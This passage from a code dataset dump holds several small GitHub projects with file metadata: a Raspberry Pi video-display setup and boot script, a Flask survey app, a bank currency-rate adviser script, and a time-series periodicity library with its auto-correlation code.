(stretch)*\n2) [Optional] Set the hostname using `raspi-config`\n3) Set the time zone using `raspi-config`\n4) Enable GPIO using `raspi-config`\n5) Clone the following two repositories into the same parent folder:\n * [https://github.com/cornelltech/opencv-video-loops](https://github.com/cornelltech/opencv-video-loops) \n * [https://github.com/cornelltech/visaware](https://github.com/cornelltech/visaware) \n6) Copy the file `autostart` (in this directory) as follows\n `cp autostart /home/pi/.config/lxsession/LXDE-pi/\n7) Create the following three files in this direcotry:\n\nFilename | Text to put in the file (example)\n----------------------- | ---------------------------------\nOTHER_PISHOW_IP_ADDRESS | 128.84.84.130\nSCREEN_RESOLUTION | 1024x768\nWEBCAM_STREAM_URL | http://128.84.84.129:8080/?action=stream\n\n8) Reboot\n\nAnd this board is ready to go...\n" }, { "alpha_fraction": 0.6410256624221802, "alphanum_fraction": 0.6410256624221802, "avg_line_length": 39, "blob_id": "e3120ec3356bc4a513d9862d2fd9c78291053674", "content_id": "efe8d513680702c3e15f81ac81c5a081ffef8c99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39, "license_type": "no_license", "max_line_length": 39, "num_lines": 1, "path": "/pishow/src/gray.py", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "../../../opencv-video-loops/src/gray.py" }, { "alpha_fraction": 0.5223795771598816, "alphanum_fraction": 0.5286118984222412, "avg_line_length": 28.41666603088379, "blob_id": "a5e73e751d885e874fc98071a528c182085a3359", "content_id": "b1a87ba339091cf7c5f4a48d2a64bf0e0a9ef662", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1765, "license_type": "no_license", "max_line_length": 80, "num_lines": 60, "path": "/pishow/src/on_off_timer.py", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\"\"\"on_off_timer.py - alternates on/off state for specific on/off durations\"\"\"\n\nimport time\n\n\nclass OnOffTimer(object):\n \"\"\"Alternate between ON and OFF states for specific On/Off durations\"\"\"\n\n def __init__(self, on_duration, off_duration, startOn=False):\n \"\"\"constructor\"\"\"\n self.on_duration = on_duration\n self.off_duration = off_duration\n self._is_on = startOn\n now = time.time()\n if startOn:\n self.turn_on_time = now\n self.turn_off_time = None\n else:\n self.turn_on_time = None\n self.turn_off_time = now\n\n def is_on(self):\n \"\"\"\n Returns whether we are on or not right now (first return value of pair),\n but it also returns whether we have just switched state from ON to OFF\n or vice versa.\n \"\"\"\n now = time.time()\n just_switched = False\n if self._is_on:\n # we are on now\n if now - self.turn_on_time > self.on_duration:\n # exceeded the ON time, turn off\n self._is_on = False\n self.turn_off_time = now\n just_switched = True\n else:\n # we are off now\n if now - self.turn_off_time > self.off_duration:\n # exceeded the OFF time, turn on\n self._is_on = True\n self.turn_on_time = now\n just_switched = True\n\n return (self._is_on, just_switched)\n\n def is_off(self):\n \"\"\"trivial\"\"\"\n return not self.is_on()\n\n\n# unit test:\nif __name__ == \"__main__\":\n TIMER = OnOffTimer(.33, .67, True)\n COUNT = 0\n while COUNT < 42:\n print(TIMER.is_on())\n time.sleep(.05)\n COUNT += 1\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 45, "blob_id": "805c018851d9ea9b843425fe8b09a3e84791695a", "content_id": "55295c8f20d3f2725eeed0614c4d830bae0d3c8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 45, "license_type": "no_license", "max_line_length": 45, "num_lines": 1, "path": "/pishow/src/avg_frames.py", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "../../../opencv-video-loops/src/avg_frames.py" }, { "alpha_fraction": 0.6268515586853027, "alphanum_fraction": 0.6416640281677246, "avg_line_length": 40.75, "blob_id": "e09382ff37fb68c08b8841bc26688743dcf2d75e", "content_id": "32cdecf61c12af6e5a442586dfc525d5ec161af1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3173, "license_type": "no_license", "max_line_length": 98, "num_lines": 76, "path": "/pishow/src/boot_script.sh", "repo_name": "cornelltech/visaware", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# This is the script that user pi runs on pishow boot. This starts everything.\n#\n# NOTES: do not change the code in this script. You control it by changing\n# values in other files, in the same directory (folder) as this script:\n#\n# To change screen resolution (it depends on your screen or screen)\n# change it in the file SCREEN_RESOLUTION\n#\n# To change the IP address of the other Raspberry Pi board to which you are\n# sending commands - the one that is connected to the projector or screen on\n# the other end, change the IP address in the file OTHER_PISHOW_IP_ADDRESS\n#\n# To change the URL of the webcam you are using on the other end, change\n# the full URL of the webcam's stream in the file WEBCAM_STREAM_URL\n#\n# This script is started on a Raspberry Pi board that has been set up for\n# 1) Automatic login of user pi into a graphical desktop (to set this auto-\n# login up, use the command `sudo raspi-config`)\n# 2) Add the following line to `/home/pi/.config/lxsession/LXDE-pi/autostart`:\n# @lxterminal --command=\"/home/pi/workspace/visaware/pishow/src/boot_script.sh\"\n\nMY_DIR=$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\nLOG_FILE=\"/home/pi/logs/boot_script`date +%F`.log\"\n\ncd $MY_DIR\n\nif [ ! -e \"SCREEN_RESOLUTION\" ]; then\n echo \"You must have a file named SCREEN_RESOLUTION in\" >> \"$LOG_FILE\"\n echo -n \"$MY_DIR with the resolution of your screen (or \" >> \"$LOG_FILE\"\n echo \"projector in it (e.g. 800x600), exiting...\" >> \"$LOG_FILE\"\n exit 1\nfi\n\nif [ ! -e \"WEBCAM_STREAM_URL\" ]; then\n echo \"You must have a file named WEBCAM_STREAM_URL in \" >> \"$LOG_FILE\"\n echo -n \"$MY_DIR with the URL of the webcam stream in it\" >> \"$LOG_FILE\"\n echo \"(http://128.84.84.129:8080/?action=stream), exiting...\" >> \"$LOG_FILE\"\n exit 1\nfi\n\nif [ ! -e \"OTHER_PISHOW_IP_ADDRESS\" ]; then\n echo \"You must have a file named OTHER_PISHOW_IP_ADDRESS in \" >> \"$LOG_FILE\"\n echo -n \"$MY_DIR with other Raspberry-Pi's IP address in it\" >> \"$LOG_FILE\"\n echo \"(e.g. 128.84.84.130), exiting...\" >> \"$LOG_FILE\"\n exit 1\nfi\n\n# full-screen width & height of screen\nWIDTH=\"`cat SCREEN_RESOLUTION | sed 's/x/ /' | awk '{print $1}'`\"\nHEIGHT=\"`cat SCREEN_RESOLUTION | sed 's/x/ /' | awk '{print $2}'`\"\nMY_IP=\"`ifconfig | grep -A 1 eth0 | grep inet | awk '{print $2}'`\"\nOTHER_IP=\"`cat OTHER_PISHOW_IP_ADDRESS`\"\nWEBCAM_URL=\"`cat WEBCAM_STREAM_URL`\"\n\n# make sure the logs directory exists\nmkdir -p \"/home/pi/logs\"\n\nCMD=\"./avg_frames_on_button_click.py\"\n\necho \"----------------------------------------------------------\" >> \"$LOG_FILE\"\necho \"`date` - boot_script.sh: starting ..\" >> \"$LOG_FILE\"\necho \"Fullscreen size: ${WIDTH}x$HEIGHT\" >> \"$LOG_FILE\"\necho \"My (pishow) IP: $MY_IP\" >> \"$LOG_FILE\"\necho \"Other (pishow) IP: $OTHER_IP\" >> \"$LOG_FILE\"\necho \"Webcam URL: $WEBCAM_URL\" >> \"$LOG_FILE\"\necho \"----------------------------------------------------------\" >> \"$LOG_FILE\"\n\nsetterm -powerdown 0\n\n# the following line logs board temperature every 10 seconds:\n( while true; do vcgencmd measure_temp; vcgencmd get_throttled; sleep 60 ; done >> \"$LOG_FILE\" ) &\n\nDISPLAY=:0 \"$CMD\" \"$MY_IP\" \"$OTHER_IP\" \"$WEBCAM_URL\" \"$WIDTH\" \"$HEIGHT\" \\\n >> \"$LOG_FILE\" 2>&1\n" } ]
18
TruxSux/flask-survey
https://github.com/TruxSux/flask-survey
83b7e3622074d7899d60833b9727c3ab237ab845
3b17846cfc4c5c7917dfa41880eb717e8e09cfd7
b7be6a830c312b2edef6cdfb653733eab2fd9e1d
refs/heads/main
2023-07-18T07:05:26.335524
2021-09-10T04:48:55
2021-09-10T04:48:55
404,865,874
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6610562801361084, "alphanum_fraction": 0.6633778214454651, "avg_line_length": 36.4782600402832, "blob_id": "f43bee601adf2fe2d5451866811eed5a343015ca", "content_id": "e5f906bf33411a3e336d0cd2002817b98c186fa6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1723, "license_type": "no_license", "max_line_length": 94, "num_lines": 46, "path": "/app.py", "repo_name": "TruxSux/flask-survey", "src_encoding": "UTF-8", "text": "from flask import render_template, session, redirect, request, Flask, flash\nimport surveys\n\napp = Flask(__name__)\napp.config[\"DEBUG_TB_INTERCEPT_REDIRECTS\"] = False\napp.config[\"SECRET_KEY\"] = 'nimdA'\n\[email protected](\"/\")\ndef show_home_page():\n if not session.get('c_qid'):\n session[\"c_qid\"] = 0\n session[\"responses\"] = []\n return render_template(\"home.html\")\n elif session[\"c_qid\"] < len(surveys.satisfaction_survey.questions):\n flash(\"Returning you to your unfinished survey\")\n return redirect(f\"/question/{session['c_qid']}\")\n #This return will only be reached if user attempts to redo the survey after completing it.\n return redirect(\"/finished\")\n\[email protected](\"/question/<q_number>\")\ndef show_question_page(q_number):\n #check if current question is actually past the last one, then render a different page\n \n if int(q_number) != session[\"c_qid\"]:\n flash(\"Invalid question id / Havent completed earlier questions\")\n return redirect(f\"/question/{session['c_qid']}\")\n if str(len(surveys.satisfaction_survey.questions)) == q_number:\n return redirect(\"/finished\")\n c_question = surveys.satisfaction_survey.questions[int(q_number)]\n return render_template(\n \"questions.html\",\n question_number=str(int(q_number) + 1),\n question=c_question.question,\n choices=c_question.choices,\n redirect_link=str(int(q_number) + 1),\n )\n\[email protected](\"/answer\", methods=[\"POST\"])\ndef get_answer():\n session[\"responses\"].append(request.form[\"answer\"])\n session[\"c_qid\"] += 1\n return redirect(f\"/question/{session['c_qid']}\")\n\[email protected](\"/finished\")\ndef show_finished_page():\n return render_template(\"finished.html\")" } ]
1
d3QUone/rates
https://github.com/d3QUone/rates
ba591e5c2d81dbbd584685222c30128eebdfcb14
1587af388417f77e22175bc61091ee664dadc1d4
343e5786081bdec51df590d879eb0d603c5ec083
refs/heads/master
2021-01-10T12:44:49.316514
2016-01-09T08:36:53
2016-01-09T08:36:53
48,881,751
3
0
null
null
null
null
null
[ { "alpha_fraction": 0.7218194007873535, "alphanum_fraction": 0.7284113168716431, "avg_line_length": 23.868852615356445, "blob_id": "1cbadb5432cb78d469d44e2479bc14c691fd6ec6", "content_id": "8e288376223cba92750d328fab96445f983d353c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1640, "license_type": "no_license", "max_line_length": 111, "num_lines": 61, "path": "/README.md", "repo_name": "d3QUone/rates", "src_encoding": "UTF-8", "text": "Tinkoff-Bank debit card rates and suggestions script\n\nWorkflow with the current [config](config.yaml):\n\n![Example output](assets/v4.png)\n\n### Description\n\nСкрипт работает с официальными курсами валют для дебетовых карт Тинькофф-банка, предлагает варианты арбитража. \n\nЛучше всего использовать в паре с https://tinkoffrates.ru\n\n## How to\n\n### Setup, A - global\n\n1) Install dependencies: `pip install -r requirements.txt`\n\n2) Create the Alias to reach fast response in .bash_profile (OSX): type `nano ~/.bash_profile` and add \n\n```bash\nalias rates=\"cd path/to/rates/folder/ && python main.py\"\n```\n\nwhere you must replace `path/to/rates/folder/` with the real path.\n\n### Setup, B - localized (recommended)\n\n1) Create virtual environment in project folder: `virtualenv venv`\n\n2) Install dependencies: `venv/bin/pip install -r requirements.txt`\n \n3) Create the Alias to reach fast response in .bash_profile (OSX): type `nano ~/.bash_profile` and add \n\n```bash\nalias rates=\"cd path/to/rates/folder/ && venv/bin/python main.py\"\n```\n \nwhere you must replace `path/to/rates/folder/` with the real path.\n\nE.g. on my machine the command is: \n\n```bash\nalias rates=\"cd /Users/vladimir/Desktop/rates && venv/bin/python main.py\"\n``` \n\nand I launch this only by typing `rates`.\n\n### Usage \n\nEdit the [config.yaml](config.yaml) file with your money amount and just run the script.\n\n## Future steps\n\n* Add command line arguments and different work-mods\n* Add more suggestions \n* Add more arbitrate cases\n\n------\n\nCopyright 2016 Vladimir Kasatkin\n" }, { "alpha_fraction": 0.7962962985038757, "alphanum_fraction": 0.8148148059844971, "avg_line_length": 17, "blob_id": "84c8cf21c0f49b513baa97973c1379f37b21d7a6", "content_id": "c661a1498a1f2294e3646246aa8ababa777acffc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 54, "license_type": "no_license", "max_line_length": 37, "num_lines": 3, "path": "/requirements.txt", "repo_name": "d3QUone/rates", "src_encoding": "UTF-8", "text": "requests\npyyaml\ngit+https://github.com/d3QUone/logger\n" }, { "alpha_fraction": 0.4752071499824524, "alphanum_fraction": 0.4769917130470276, "avg_line_length": 37.645320892333984, "blob_id": "804d1ee41ddce3104d0c55f1896cd5212e75bc16", "content_id": "0d717841f4ffb38d1a86834a8d76383623c9764e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7845, "license_type": "no_license", "max_line_length": 116, "num_lines": 203, "path": "/main.py", "repo_name": "d3QUone/rates", "src_encoding": "UTF-8", "text": "__author__ = 'vladimir'\n\nimport sys\nimport json\n\nimport yaml\nimport requests\n\nfrom logger import Logger\n\nlog = Logger(\"rates\")\n\n\nclass Adviser(object):\n URL = \"https://www.tinkoff.ru/api/v1/currency_rates/\"\n CATEGORY = \"DebitCardsTransfers\"\n RUR_key = \"RUB\"\n USD_key = \"USD\"\n EUR_key = \"EUR\"\n ALL_CURRENCIES = (RUR_key, USD_key, EUR_key)\n\n def __init__(self):\n with open(\"config.yaml\", \"r\") as f:\n self.config = yaml.load(f)\n self.rub_amount = self.config[self.RUR_key]\n self.usd_amount = self.config[self.USD_key]\n self.eur_amount = self.config[self.EUR_key]\n self.values = {}\n\n def __filter_data(self, data):\n \"\"\"Removes extra data and filter all rates by currencies\"\"\"\n for item in data:\n if not (item[\"category\"] != self.CATEGORY or item[\"fromCurrency\"][\"name\"] not in self.ALL_CURRENCIES\n or item[\"toCurrency\"][\"name\"] not in self.ALL_CURRENCIES):\n name = item[\"fromCurrency\"][\"name\"]\n if name not in self.values:\n self.values[name] = {}\n self.values[name][item[\"toCurrency\"][\"name\"]] = {\n \"sell\": item[\"sell\"], # ! bank sells\n \"buy\": item[\"buy\"], # ! bank buys\n }\n log.debug(json.dumps(self.values, indent=2))\n\n def __load_rates(self):\n \"\"\"Initialize loading action\"\"\"\n try:\n data = requests.get(self.URL).json()\n self.__filter_data(data[\"payload\"][\"rates\"])\n except Exception as e:\n log.error(\"load_rates error: {}\".format(repr(e)))\n\n def show_available(self):\n return \"{} RUR, {} USD, {} EUR\".format(\n Logger.colorize(\"green\" if self.rub_amount > 0 else \"red\", self.rub_amount),\n Logger.colorize(\"green\" if self.usd_amount > 0 else \"red\", self.usd_amount),\n Logger.colorize(\"green\" if self.eur_amount > 0 else \"red\", self.eur_amount),\n )\n\n def get(self, args):\n if len(args) == 4:\n _, _, amount, currency = args\n if currency not in self.ALL_CURRENCIES:\n log.error(\"Currency {} is not supported\".format(\n Logger.colorize(\"blue\", currency)\n ))\n return\n elif len(args) == 3:\n _, _, amount = args\n currency = self.RUR_key\n log.info(\"No currency was provided, using {} by default\".format(\n Logger.colorize(\"blue\", currency)\n ))\n else:\n log.error(\"Usage: {} {}\".format(\n Logger.colorize(\"green\", \"get\"),\n Logger.colorize(\"red\", \"amount [currency]\")\n ))\n return\n\n s = \"\\n\\n\\t{}\".format(self.show_available())\n\n log.info(s)\n\n def help(self):\n \"\"\"Calculate all variants\"\"\"\n self.__load_rates()\n\n all_amount_to_usd = (self.eur_amount * self.values[self.EUR_key][self.USD_key][\"buy\"] + self.usd_amount) * \\\n self.values[self.USD_key][self.RUR_key][\"buy\"]\n all_amount_to_eur = (self.usd_amount * self.values[self.USD_key][self.EUR_key][\"buy\"] + self.eur_amount) * \\\n self.values[self.EUR_key][self.RUR_key][\"buy\"]\n\n all_cases = (\n {\n \"name\": \"EUR[RUB]\",\n \"description\": \"Convert EUR to RUB\",\n \"dimension\": \"RUB\",\n \"value\": self.eur_amount * self.values[self.EUR_key][self.RUR_key][\"buy\"],\n },\n {\n \"name\": \"USD[RUB]\",\n \"description\": \"Convert USD to RUB\",\n \"dimension\": \"RUB\\n\",\n \"value\": self.usd_amount * self.values[self.USD_key][self.RUR_key][\"buy\"],\n },\n {\n \"name\": \"EUR[USD]\",\n \"description\": \"Convert EUR to USD\",\n \"dimension\": \"USD\",\n \"value\": self.eur_amount * self.values[self.EUR_key][self.USD_key][\"buy\"],\n },\n {\n \"name\": \"RUB[USD]\",\n \"description\": \"Convert RUB to USD\",\n \"dimension\": \"USD\",\n \"value\": self.rub_amount / self.values[self.USD_key][self.RUR_key][\"sell\"],\n },\n {\n \"name\": \"RUB[USD]+EUR[USD]\",\n \"description\": \"Convert RUB and EUR to USD\",\n \"dimension\": \"USD\\n\",\n \"value\": self.rub_amount / self.values[self.USD_key][self.RUR_key][\"sell\"] +\n self.eur_amount * self.values[self.EUR_key][self.USD_key][\"buy\"],\n },\n # TODO: add total in usd\n {\n \"name\": \"USD[EUR]\",\n \"description\": \"Convert USD to EUR\",\n \"dimension\": \"EUR\",\n \"value\": self.usd_amount * self.values[self.USD_key][self.EUR_key][\"buy\"],\n },\n {\n \"name\": \"RUB[EUR]\",\n \"description\": \"Convert RUB to EUR\",\n \"dimension\": \"EUR\",\n \"value\": self.rub_amount / self.values[self.EUR_key][self.RUR_key][\"sell\"],\n },\n {\n \"name\": \"RUB[EUR]+USD[EUR]\",\n \"description\": \"Convert RUB and USD to EUR\",\n \"dimension\": \"EUR\\n\",\n \"value\": self.rub_amount / self.values[self.EUR_key][self.RUR_key][\"sell\"] +\n self.usd_amount * self.values[self.USD_key][self.EUR_key][\"buy\"],\n },\n # TODO: add total in eur\n {\n \"name\": \"(EUR[USD]+USD)[RUB]\",\n \"description\": \"Total EUR and USD in USD\",\n \"dimension\": \"RUB\",\n \"value\": all_amount_to_usd,\n },\n {\n \"name\": \"(USD[EUR]+EUR)[RUB]\",\n \"description\": \"Total EUR and USD in EUR\",\n \"dimension\": \"RUB\",\n \"value\": all_amount_to_eur,\n },\n )\n \n s = \"\\n\\n\\t{}\\n\\n\\tUSD/RUR: {} / {}\\n\\tEUR/RUR: {} / {}\\n\\n\".format(\n self.show_available(),\n Logger.colorize(\"green\", self.values[self.USD_key][self.RUR_key][\"buy\"]),\n Logger.colorize(\"red\", self.values[self.USD_key][self.RUR_key][\"sell\"]),\n Logger.colorize(\"green\", self.values[self.EUR_key][self.RUR_key][\"buy\"]),\n Logger.colorize(\"red\", self.values[self.EUR_key][self.RUR_key][\"sell\"]),\n )\n for case in all_cases:\n if \"value\" in case and not (\"disabled\" in case and not case[\"disabled\"]):\n s += \"{} = {} {}\\n\".format(\n case[\"description\"],\n Logger.colorize(\"bold\", round(case[\"value\"], 3)),\n Logger.colorize(\"blue\", case[\"dimension\"])\n )\n # show profit\n if all_amount_to_usd > all_amount_to_eur:\n s += \"If move all into {} profit = {} {}\\n\".format(\n Logger.colorize(\"green\", \"USD\"),\n Logger.colorize(\"green\", round(all_amount_to_usd - all_amount_to_eur, 1)),\n Logger.colorize(\"green\", \"RUR\")\n )\n else:\n s += \"If move all into {} profit = {} {}\\n\".format(\n Logger.colorize(\"green\", \"EUR\"),\n Logger.colorize(\"green\", round(all_amount_to_eur - all_amount_to_usd, 1)),\n Logger.colorize(\"green\", \"RUR\")\n )\n s += \"=\" * 50\n log.info(s)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n command = sys.argv[1]\n else:\n command = None\n\n adviser = Adviser()\n if not command:\n adviser.help()\n elif command == \"get\":\n adviser.get(sys.argv)\n else:\n log.error(\"Command {} is not available\".format(Logger.colorize(\"red\", command)))\n" } ]
3
812231487/periodicity
https://github.com/812231487/periodicity
b10225b353afbbba6d2b583597d01b08e272b1b3
cdd906f9e3051949315475544a90d8491eaf2f70
44cd96bb48a7e23edcc6ce9835dad21fab7b3e6e
refs/heads/master
2021-01-05T13:48:14.681316
2019-08-23T00:11:34
2019-08-23T00:11:34
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7074607610702515, "alphanum_fraction": 0.7264397740364075, "avg_line_length": 29.559999465942383, "blob_id": "46d86c27063f21063f331117df40c8a0d3bf6498", "content_id": "0e51c8a7b16f02019852c21868c68451985a3c59", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1528, "license_type": "permissive", "max_line_length": 93, "num_lines": 50, "path": "/README.md", "repo_name": "812231487/periodicity", "src_encoding": "UTF-8", "text": "# Periodicity\n\nUseful tools for analysis of periodicities in time series data.\n\nIncludes:\n* Auto-Correlation Function\n* Fourier methods:\n * Lomb-Scargle periodogram\n * Wavelet Transform (in progress)\n* Phase-folding methods:\n * String Length\n * Phase Dispersion Minimization\n * Analysis of Variance (in progress)\n* Gaussian Processes:\n * `george` implementation\n * `celerite` implementation\n * `pymc3` implementation (in progress)\n\n## Quick start\n### Installing current release from pypi (v0.1.0-alpha)\n $ pip install periodicity\n### Installing current development version\n $ git clone https://github.com/dioph/periodicity.git\n $ cd periodicity\n $ python setup.py install\n## Example using GP with astronomical data\n```python\nfrom periodicity.gp import *\nfrom lightkurve import search_lightcurvefile\n\nlcs = search_lightcurvefile(target=9895037, quarter=[4,5]).download_all()\nlc = lcs[0].PDCSAP_FLUX.normalize().append(lcs[1].PDCSAP_FLUX.normalize())\nlc = lc.remove_nans().remove_outliers().bin(binsize=4)\n\nt, x = lc.time, lc.flux\nx = x - x.mean()\n\nmodel = FastGPModeler(t, x)\nmodel.prior = make_gaussian_prior(t, x)\nmodel.minimize()\nsamples = model.mcmc(nwalkers=32, nsteps=5000, burn=500)\n\nprint('Median period: {:.2f}'.format(np.exp(np.median(samples[:, 4]))))\n```\n\n### Visualization of this example:\n\n![gp_example](https://github.com/dioph/periodicity/blob/master/figures/example2.png?raw=True)\n\n![gp_example](https://github.com/dioph/periodicity/blob/master/figures/example1.png?raw=True)\n" }, { "alpha_fraction": 0.5224675536155701, "alphanum_fraction": 0.5340259671211243, "avg_line_length": 24.75250816345215, "blob_id": "5f8c7fe658d14c1f8f801a4d1d1a832889373895", "content_id": "d7fffc0f94770691a121996a85687c0baa982a38", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7700, "license_type": "permissive", "max_line_length": 106, "num_lines": 299, "path": "/periodicity/acf.py", "repo_name": "812231487/periodicity", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy import signal\nfrom scipy.optimize import minimize\nfrom astropy.convolution import Box1DKernel\n\n\ndef acf(y, t=None, maxlag=None, s=0, fill=False):\n \"\"\"Auto-Correlation Function implemented using IFFT of the power spectrum.\n\n Parameters\n ----------\n y: array-like\n discrete input signal\n t: array-like (optional)\n time array\n maxlag: int (optional)\n maximum lag to compute ACF\n # TODO: turn maxlag into a measure of time if t is given\n s: int (optional)\n standard deviation of Gaussian filter used to smooth ACF, measured in samples\n fill: bool (optional default=False)\n whether to use linear interpolation to sample signal uniformly\n\n Returns\n -------\n lags: array-like\n array of lags\n R: array-like\n ACF of input signal\n \"\"\"\n if t is None:\n t = np.arange(len(y))\n\n if fill:\n t, y = fill_gaps(t, y)\n\n N = len(y)\n\n if maxlag is None:\n maxlag = N\n\n f = np.fft.fft(y - y.mean(), n=2 * N)\n R = np.fft.ifft(f * np.conjugate(f))[:maxlag].real\n\n if s > 0:\n kernel = gaussian(mu=0, sd=s)\n h = kernel(np.arange(-(3 * s - 1), 3 * s, 1.))\n R = smooth(R, kernel=h)\n\n R /= R[0]\n lags = t[:maxlag] - np.min(t[:maxlag])\n\n return lags, R\n\n\ndef fill_gaps(t, y):\n \"\"\"Linear interpolation to create a uniformly sampled signal\n\n Parameters\n ----------\n t: array-like\n time array\n y: array-like\n signal array\n\n Returns\n -------\n tnew: array-like\n new sampling times uniformly spaced\n ynew: array-like\n signal with gaps filled by linear interpolation\n \"\"\"\n T = float(np.median(np.diff(t)))\n gaps = np.where(np.diff(t) > 1.5 * T)[0]\n t_gaps = []\n y_gaps = []\n tnew = t\n ynew = y\n for g in gaps:\n t0, t1 = tnew[g:g + 2]\n y0, y1 = ynew[g:g + 2]\n tfill = np.arange(t0 + T, t1, T)\n t_gaps.append(tfill)\n y_gaps.append(y0 + (tfill - t0) * (y1 - y0) / (t1 - t0))\n ids = []\n shift = 1\n for i, tg, yg in zip(gaps, t_gaps, y_gaps):\n idx = i + shift\n tnew = np.insert(tnew, idx, tg)\n ynew = np.insert(ynew, idx, yg)\n n = len(tg)\n ids.append(np.arange(idx, idx + n))\n shift += n\n tnew = np.arange(tnew.size) * T + tnew[0]\n return tnew, ynew\n\n\ndef find_peaks(y, t=None, delta=0.):\n \"\"\"Finds function maxima and the corresponding peak heights\n\n Parameters\n ----------\n y: array-like\n signal array\n t: array-like (optional)\n time array\n if not given will use indexes\n delta: float (optional)\n minimum difference between a peak and the following points before a peak may be considered a peak.\n default: 0.0\n recommended: delta >= RMSnoise * 5\n\n Returns\n -------\n peaks: array-like\n [tmax, ymax] for each maximum found\n heights: array-like\n average peak heights for each peak found\n \"\"\"\n peaks = []\n dips = []\n if t is None:\n t = np.arange(len(y))\n y = np.asarray(y)\n assert len(t) == len(y), \"t and y must have same length\"\n\n mn, mx = np.inf, -np.inf\n mnpos, mxpos = np.nan, np.nan\n lookformax = False\n\n for i in range(len(y)):\n if y[i] > mx:\n mx = y[i]\n mxpos = t[i]\n if y[i] < mn:\n mn = y[i]\n mnpos = t[i]\n if lookformax:\n if y[i] < mx-delta:\n peaks.append((mxpos, mx))\n mn = y[i]\n mnpos = t[i]\n lookformax = False\n else:\n if y[i] > mn+delta and mn != -np.inf:\n dips.append((mnpos, mn))\n mx = y[i]\n mxpos = t[i]\n lookformax = True\n peaks = np.array(peaks)\n dips = np.array(dips)\n\n heights = []\n for i in range(len(peaks)):\n h1 = peaks[i, 1] - dips[i, 1]\n try:\n h2 = peaks[i, 1] - dips[i+1, 1]\n heights.append((h1+h2)/2)\n except IndexError:\n heights.append(h1)\n heights = np.array(heights)\n\n if heights.size == 0 and delta > 1e-6:\n return find_peaks(y=y, t=t, delta=delta/2)\n\n return peaks, heights\n\n\ndef gaussian(mu, sd):\n \"\"\"Simple 1D Gaussian function generator\n\n Parameters\n ----------\n mu: float\n mean\n sd: float\n standard deviation\n\n Returns\n -------\n f: function\n 1D Gaussian with given parameters\n \"\"\"\n def f(x):\n return 1 / (np.sqrt(2 * np.pi) * sd) * np.exp(-.5 * ((x - mu) / sd) ** 2)\n\n return f\n\n\ndef smooth(y, kernel):\n \"\"\"Wrap to numpy.convolve\n\n Parameters\n ----------\n y: array-like\n input noisy signal\n kernel: array-like\n FIR filter to smooth the signal\n Returns\n -------\n yf: array-like\n Smoothed signal\n \"\"\"\n double_y = np.append(y[::-1], y)\n yf = np.convolve(double_y, kernel, mode='same')[len(y):]\n return yf\n\n\ndef filt(x, lo, hi, fs, order=5):\n \"\"\"Implements a band-pass IIR butterworth filter\n\n Parameters\n ----------\n x: array-like\n input signal to be filtered\n lo: float\n lower cutoff frequency\n hi: float\n higher cutoff frequency\n fs: float\n sampling frequency of signal\n order: int (optional default=5)\n order of the butterworth filter\n\n Returns\n -------\n xf: array-like\n filtered signal\n \"\"\"\n nyq = .5 * fs\n lo /= nyq\n hi /= nyq\n b, a = signal.butter(N=order, Wn=[lo, hi], btype='band')\n xf = signal.filtfilt(b, a, x)\n return xf\n\n\ndef acf_harmonic_quality(t, x, pmin=None, periods=None, a=1, b=2, n=8):\n \"\"\"Calculates the quality of the ACF of a band-pass filtered version of the signal\n\n t: array-like\n time array\n x: array-like\n signal array\n pmin: float (optional)\n lower cutoff period to filter signal\n periods: list (optional)\n list of higher cutoff periods to filter signal\n Will only consider periods between `pmin` and half the baseline\n a, b, n: floats (optional)\n if `periods` is not given then it assumes the first `n` powers of `b` scaled by `a`:\n periods = a * b ** np.arange(n)\n defaults are a=1, b=2, n=8\n\n Returns\n -------\n ps: list\n highest peaks (best periods) for each filtered version\n hs: list\n maximum heights for each filtered version\n qs: list\n quality factor of each best period\n \"\"\"\n if periods is None:\n periods = a * b ** np.arange(n)\n fs = 1 / float(np.median(np.diff(t)))\n if pmin is None:\n pmin = max(np.min(periods) / 10, 3 / fs)\n t -= np.min(t)\n periods = np.array([pi for pi in periods if pmin < pi < np.max(t) / 2])\n ps = []\n hs = []\n qs = []\n for pi in periods:\n xf = filt(x, 1 / pi, 1 / pmin, fs)\n ml = np.where(t >= 2 * pi)[0][0]\n lags, R = acf(xf, t, maxlag=ml)\n if pi >= 20:\n R = smooth(R, Box1DKernel(width=pi // 10))\n try:\n peaks, heights = find_peaks(R, lags)\n bp_acf = peaks[np.argmax(heights)][0]\n except:\n continue\n ps.append(bp_acf)\n hs.append(np.max(heights))\n tau_max = 20 * pi / bp_acf\n\n def eps(params):\n acf_model = params[0] * np.exp(-lags / params[1]) * np.cos(2 * np.pi * lags / bp_acf)\n return np.sum(np.square(R - acf_model))\n\n results = minimize(fun=eps, x0=np.array([1., bp_acf*2]))\n A, tau = results.x\n tau = min(tau, tau_max)\n ri = eps(results.x)\n qs.append((tau / bp_acf) * (ml * hs[-1] / ri))\n\n return ps, hs, qs\n" }, { "alpha_fraction": 0.5440564751625061, "alphanum_fraction": 0.5624334812164307, "avg_line_length": 34.407535552978516, "blob_id": "88ec9b2cdcf413bf2651c68873ff8dc9c3cd2e44", "content_id": 